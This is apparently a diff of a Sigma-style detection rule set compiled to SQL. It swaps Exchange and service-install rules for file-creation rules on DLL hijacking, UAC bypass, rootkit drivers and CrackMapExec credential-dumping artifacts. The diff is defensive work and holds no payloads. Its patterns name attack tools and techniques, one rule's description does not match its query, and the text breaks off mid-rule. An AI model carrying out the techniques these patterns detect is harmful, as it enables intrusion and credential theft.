[ "attack.persistence", - "attack.t1505.003" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1574.001" ], "falsepositives": [ - "Unknown" + "Any powershell script that creates bat files" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 'Set-OabVirtualDirectory' AND = 'ExternalUrl' AND LIKE 'Page\\_Load' ESCAPE '\\' AND = 'script')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%.bat' ESCAPE '\\')" ], - "filename": "win_exchange_set_oabvirtualdirectory_externalurl.yml" + "filename": "file_event_win_hktl_powerup_dllhijacking.yml" }, { - "title": "Failed MSExchange Transport Agent Installation", - "id": "c7d16cae-aaf3-42e5-9c1c-fb8553faa6fa", - "status": "experimental", - "description": "Detects a failed installation of a Exchange Transport Agent", - "author": "Tobias Michalski (Nextron Systems)", + "title": "Suspicious desktop.ini Action", + "id": "81315b50-6b60-4d8f-9928-3466e1022515", + "status": "test", + "description": "Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.", + "author": "Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO)", "tags": [ "attack.persistence", - "attack.t1505.002" + "attack.t1547.009" ], "falsepositives": [ - "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." + "Operations performed through Windows SCCM or equivalent", + "Read only access list authority" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID = '6' AND Data LIKE '%Install-TransportAgent%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%\\\\desktop.ini' ESCAPE '\\' AND NOT (((Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (Image LIKE '%\\\\AppData\\\\Local\\\\JetBrains\\\\Toolbox\\\\bin\\\\7z.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\JetBrains\\\\apps\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\NewOS\\\\%' ESCAPE '\\')))" ], - "filename": "win_exchange_transportagent_failed.yml" + "filename": "file_event_win_susp_desktop_ini.yml" }, { - "title": "MSExchange Transport Agent Installation - Builtin", - "id": "4fe151c2-ecf9-4fae-95ae-b88ec9c2fca6", + "title": "TeamViewer Remote Session", + "id": "162ab1e4-6874-4564-853c-53ec3ab8be01", "status": "test", - "description": "Detects the Installation of a Exchange Transport Agent", - "author": "Tobias Michalski (Nextron Systems)", + "description": "Detects the creation of log files during a TeamViewer remote session", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1505.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." + "Legitimate uses of TeamViewer in an organisation" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND logs MATCH ('\"Install-TransportAgent\"'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\TeamViewer\\\\RemotePrinting\\\\tvprint.db' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TeamViewer\\\\TVNetwork.log' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\TeamViewer%' ESCAPE '\\' AND TargetFilename LIKE '%\\_Logfile.log%' ESCAPE '\\')))" ], - "filename": "win_exchange_transportagent.yml" + "filename": "file_event_win_susp_teamviewer_remote_session.yml" }, { - "title": "File Was Not Allowed To Run", - "id": "401e5d00-b944-11ea-8f9a-00163ecd60ae", - "status": "test", - "description": "Detect run not allowed files. Applocker is a very useful tool, especially on servers where unprivileged users have access. For example terminal servers. You need configure applocker and log collect to receive these events.", - "author": "Pushkarev Dmitry", + "title": "OneNote Attachment File Dropped In Suspicious Location", + "id": "7fd164ba-126a-4d9c-9392-0d4f7c243df0", + "status": "experimental", + "description": "Detects creation of files with the \".one\"/\".onepkg\" extension in suspicious or uncommon locations. This could be a sign of attackers abusing OneNote attachments", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002", - "attack.t1059.001", - "attack.t1059.003", - "attack.t1059.005", - "attack.t1059.006", - "attack.t1059.007" + "attack.defense_evasion" ], "falsepositives": [ - "Need tuning applocker or add exceptions in SIEM" + "Legitimate usage of \".one\" or \".onepkg\" files from those locations" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel IN ('Microsoft-Windows-AppLocker/MSI and Script', 'Microsoft-Windows-AppLocker/EXE and DLL', 'Microsoft-Windows-AppLocker/Packaged app-Deployment', 'Microsoft-Windows-AppLocker/Packaged app-Execution') AND EventID IN ('8004', '8007', '8022', '8025'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND (TargetFilename LIKE '%.one' ESCAPE '\\' OR TargetFilename LIKE '%.onepkg' ESCAPE '\\'))" ], - "filename": "win_applocker_file_was_not_allowed_to_run.yml" + "filename": "file_event_win_office_onenote_files_in_susp_locations.yml" }, { - "title": "OpenSSH Server Listening On Socket", - "id": "3ce8e9a4-bc61-4c9b-8e69-d7e2492a8781", + "title": "Drop Binaries Into Spool Drivers Color Folder", + "id": "ce7066a6-508a-42d3-995b-2952c65dc2ce", "status": "experimental", - "description": "Detects scenarios where an attacker enables the OpenSSH server and server starts to listening on SSH socket.", - "author": "mdecrevoisier", + "description": "Detects the creation of suspcious binary files inside the \"\\windows\\system32\\spool\\drivers\\color\\\" as seen in the blog referenced below", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.004" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate administrator activity" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4' AND process = 'sshd' AND payload LIKE 'Server listening on %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\color\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\'))" ], - "filename": "win_sshd_openssh_server_listening_on_socket.yml" + "filename": "file_event_win_susp_spool_drivers_color_drop.yml" }, { - "title": "DNS Server Error Failed Loading the ServerLevelPluginDLL", - "id": "cbe51394-cd93-4473-b555-edf0144952d9", - "status": "test", - "description": "Detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded", - "author": "Florian Roth (Nextron Systems)", + "title": "RDP File Creation From Suspicious Application", + "id": "fccfb43e-09a7-4bd2-8b37-a5a7df33386d", + "status": "experimental", + "description": "Detects Rclone config file being created", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'DNS Server' AND EventID IN ('150', '770', '771'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\brave.exe' ESCAPE '\\' OR Image LIKE '%\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\' OR Image LIKE '%\\\\chromium.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\' OR Image LIKE '%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\Opera.exe' ESCAPE '\\' OR Image LIKE '%\\\\Vivaldi.exe' ESCAPE '\\' OR Image LIKE '%\\\\Whale.exe' ESCAPE '\\' OR Image LIKE '%\\\\Outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR Image LIKE '%\\\\Thunderbird.exe' ESCAPE '\\' OR Image LIKE '%\\\\Discord.exe' ESCAPE '\\' OR Image LIKE '%\\\\Keybase.exe' ESCAPE '\\' OR Image LIKE '%\\\\msteams.exe' ESCAPE '\\' OR Image LIKE '%\\\\Slack.exe' ESCAPE '\\' OR Image LIKE '%\\\\teams.exe' ESCAPE '\\') AND TargetFilename LIKE '%.rdp%' ESCAPE '\\')" ], - "filename": "win_dns_server_susp_server_level_plugin_dll.yml" + "filename": "file_event_win_rdp_file_susp_creation.yml" }, { - "title": "NetSupport Manager Service Install", - "id": "2d510d8d-912b-45c5-b1df-36faa3d8c3f4", - "status": "experimental", - "description": "Detects NetSupport Manager service installation on the target system.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "InstallerFileTakeOver LPE CVE-2021-41379 File Create Event", + "id": "3be82d5d-09fe-4d6a-a275-0d40d234d324", + "status": "test", + "description": "Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.privilege_escalation", + "attack.t1068" ], "falsepositives": [ - "Legitimate use of the tool" + "Unknown", + "Possibly some Microsoft Edge upgrades" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%\\\\NetSupport Manager\\\\client32.exe%' ESCAPE '\\' OR ServiceName = 'Client32'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\')" ], - "filename": "win_system_service_install_netsupport_manager.yml" + "filename": "file_event_win_cve_2021_41379_msi_lpe.yml" }, { - "title": "Suspicious Service Installation Script", - "id": "70f00d10-60b2-4f34-b9a0-dc3df3fe762a", - "status": "experimental", - "description": "Detects suspicious service installation scripts", - "author": "pH-T (Nextron Systems)", + "title": "Moriya Rootkit", + "id": "a1507d71-0b60-44f6-b17c-bf53220fdd88", + "status": "test", + "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", + "author": "Bhabesh Raj", "tags": [ "attack.persistence", "attack.privilege_escalation", - "car.2013-09-005", "attack.t1543.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '% /c %' ESCAPE '\\' OR ImagePath LIKE '% /r %' ESCAPE '\\' OR ImagePath LIKE '% /k %' ESCAPE '\\') AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\' OR ImagePath LIKE '%wscript%' ESCAPE '\\' OR ImagePath LIKE '%cscript%' ESCAPE '\\' OR ImagePath LIKE '%mshta%' ESCAPE '\\' OR ImagePath LIKE '%rundll32%' ESCAPE '\\' OR ImagePath LIKE '%regsvr32%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\drivers\\\\MoriyaStreamWatchmen.sys' ESCAPE '\\')" ], - "filename": "win_system_susp_service_installation_script.yml" + "filename": "file_event_win_moriya_rootkit.yml" }, { - "title": "Local Privilege Escalation Indicator TabTip", - "id": "bc2e25ed-b92b-4daa-b074-b502bdd1982b", + "title": "CrackMapExec File Creation Patterns", + "id": "9433ff9c-5d3f-4269-99f8-95fc826ea489", "status": "experimental", - "description": "Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode", + "description": "Detects suspicious file creation patterns found in logs when CrackMapExec is used", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1557.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '10001' AND param1 LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ink\\\\TabTip.exe' ESCAPE '\\' AND param2 = '2147943140' AND param3 = '{054AAE20-4BEA-4347-8A35-64A533254A9D}')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\rundll32.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND (TargetFilename LIKE '%.rtf' ESCAPE '\\' OR TargetFilename LIKE '%.otf' ESCAPE '\\' OR TargetFilename LIKE '%.odt' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.pdf' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.wpd' ESCAPE '\\' OR TargetFilename LIKE '%.icns' ESCAPE '\\' OR TargetFilename LIKE '%.db' ESCAPE '\\' OR TargetFilename LIKE '%.ini' ESCAPE '\\' OR TargetFilename LIKE '%.tex' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.csv' ESCAPE '\\' OR TargetFilename LIKE '%.fon' ESCAPE '\\' OR TargetFilename LIKE '%.tar' ESCAPE '\\' OR TargetFilename LIKE '%.ttf' ESCAPE '\\' OR TargetFilename LIKE '%.xml' ESCAPE '\\' OR TargetFilename LIKE '%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.jpg' ESCAPE '\\' OR TargetFilename LIKE '%.drv' ESCAPE '\\' OR TargetFilename LIKE '%.cur' ESCAPE '\\' OR TargetFilename LIKE '%.tmp' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\procdump.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\'))))" ], - "filename": "win_system_lpe_indicators_tabtip.yml" + "filename": "file_event_win_crackmapexec_patterns.yml" }, { - "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - System", - "id": "843544a7-56e0-4dcc-a44f-5cc266dd97d6", - "status": "experimental", - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "title": "Files With System Process Name In Unsuspected Locations", + "id": "d5866ddf-ce8f-4aea-b28e-d96485a20d3d", + "status": "test", + "description": "Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64...etc).", + "author": "Sander Wiebing, Tim Shelton, Nasreddine Bencherchali", "tags": [ - "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" + "attack.defense_evasion", + "attack.t1036.005" ], "falsepositives": [ - "Highly unlikely" + "System processes copied outside their default folders for testing purposes", + "Third party software naming their software with the same names as the processes mentioned here" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%cmd.exe%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%.dll,a%' ESCAPE '\\' AND ImagePath LIKE '%/p:%' ESCAPE '\\') OR ImagePath LIKE '\\\\\\\\127.0.0.1\\\\ADMIN$\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\AtBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\backgroundTaskHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmdl32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\conhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\csrss.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dasHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dfrgui.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dwm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventcreate.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\explorer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\extrac32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fontdrvhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicli.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicpl.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\logman.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LogonUI.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\msinfo32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powershell.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\regini.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchIndexer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchProtocolHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthService.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\services.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ShellAppRuntime.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sihost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smss.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\svchost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SystemSettingsBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TiWorker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFaultSecure.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wininit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winrshost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinRTNetMUAHostServer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wslhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WSReset.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WUDFHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WWAHost.exe' ESCAPE '\\') AND NOT (((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR TargetFilename LIKE '\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\Windows\\\\System32\\\\dism.exe' ESCAPE '\\' OR Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\' AND Image LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\SetupHost.exe' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Windows\\\\system32\\\\wbengine.exe' ESCAPE '\\') OR (Image LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\')) OR (Image LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:Program Files\\\\WindowsApps\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\SecurityHealth\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' AND Image LIKE '%\\\\SecurityHealthSetup.exe' ESCAPE '\\')))" ], - "filename": "win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml" + "filename": "file_event_win_creation_system_file.yml" }, { - "title": "KrbRelayUp Service Installation", - "id": "e97d9903-53b2-41fc-8cb9-889ed4093e80", - "status": "experimental", - "description": "Detects service creation from KrbRelayUp tool used for privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings)", - "author": "Sittikorn S, Tim Shelton", + "title": "UAC Bypass Using .NET Code Profiler on MMC", + "id": "93a19907-d4f9-4deb-9f91-aac4692776a6", + "status": "test", + "description": "Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1543" + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND ServiceName = 'KrbSCM')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pe386.dll' ESCAPE '\\')" ], - "filename": "win_system_krbrelayup_service_installation.yml" + "filename": "file_event_win_uac_bypass_dotnet_profiler.yml" }, { - "title": "NTFS Vulnerability Exploitation", - "id": "f14719ce-d3ab-4e25-9ce6-2899092260b0", - "status": "test", - "description": "This the exploitation of a NTFS vulnerability as reported without many details via Twitter", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Privilege Escalation Attempt Via .Exe.Local Technique", + "id": "07a99744-56ac-40d2-97b7-2095967b0e03", + "status": "experimental", + "description": "Detects potential privilege escalation attempt via the creation of the \"*.Exe.Local\" folder inside the \"System32\" directory in order to sideload \"comctl32.dll\"", + "author": "Nasreddine Bencherchali (Nextron Systems), Subhash P (@pbssubhash)", "tags": [ - "attack.impact", - "attack.t1499.001" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Ntfs' AND EventID = '55' AND Origin = 'File System Driver' AND Description LIKE '%contains a corrupted file record%' ESCAPE '\\' AND Description LIKE '%The name of the file is \"\\\\\"%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wermgr.exe.local%' ESCAPE '\\') AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" ], - "filename": "win_system_ntfs_vuln_exploit.yml" + "filename": "file_event_win_system32_local_folder_privilege_escalation.yml" }, { - "title": "CobaltStrike Service Installations - System", - "id": "5a105d34-05fc-401e-8553-272b45c1522d", - "status": "test", - "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", - "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", + "title": "Potential Persistence Via Notepad++ Plugins", + "id": "54127bd4-f541-4ac3-afdb-ea073f63f692", + "status": "experimental", + "description": "Detects creation of new \".dll\" files inside the plugins directory of a notepad++ installation by a process other than \"gup.exe\". Which could indicates possible persistence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1543.003", - "attack.t1569.002" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Possible FPs during first installation of Notepad++", + "Legitimate use of custom plugins by users in order to enhance notepad++ functionalities" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%ADMIN$%' ESCAPE '\\' AND ImagePath LIKE '%.exe%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE 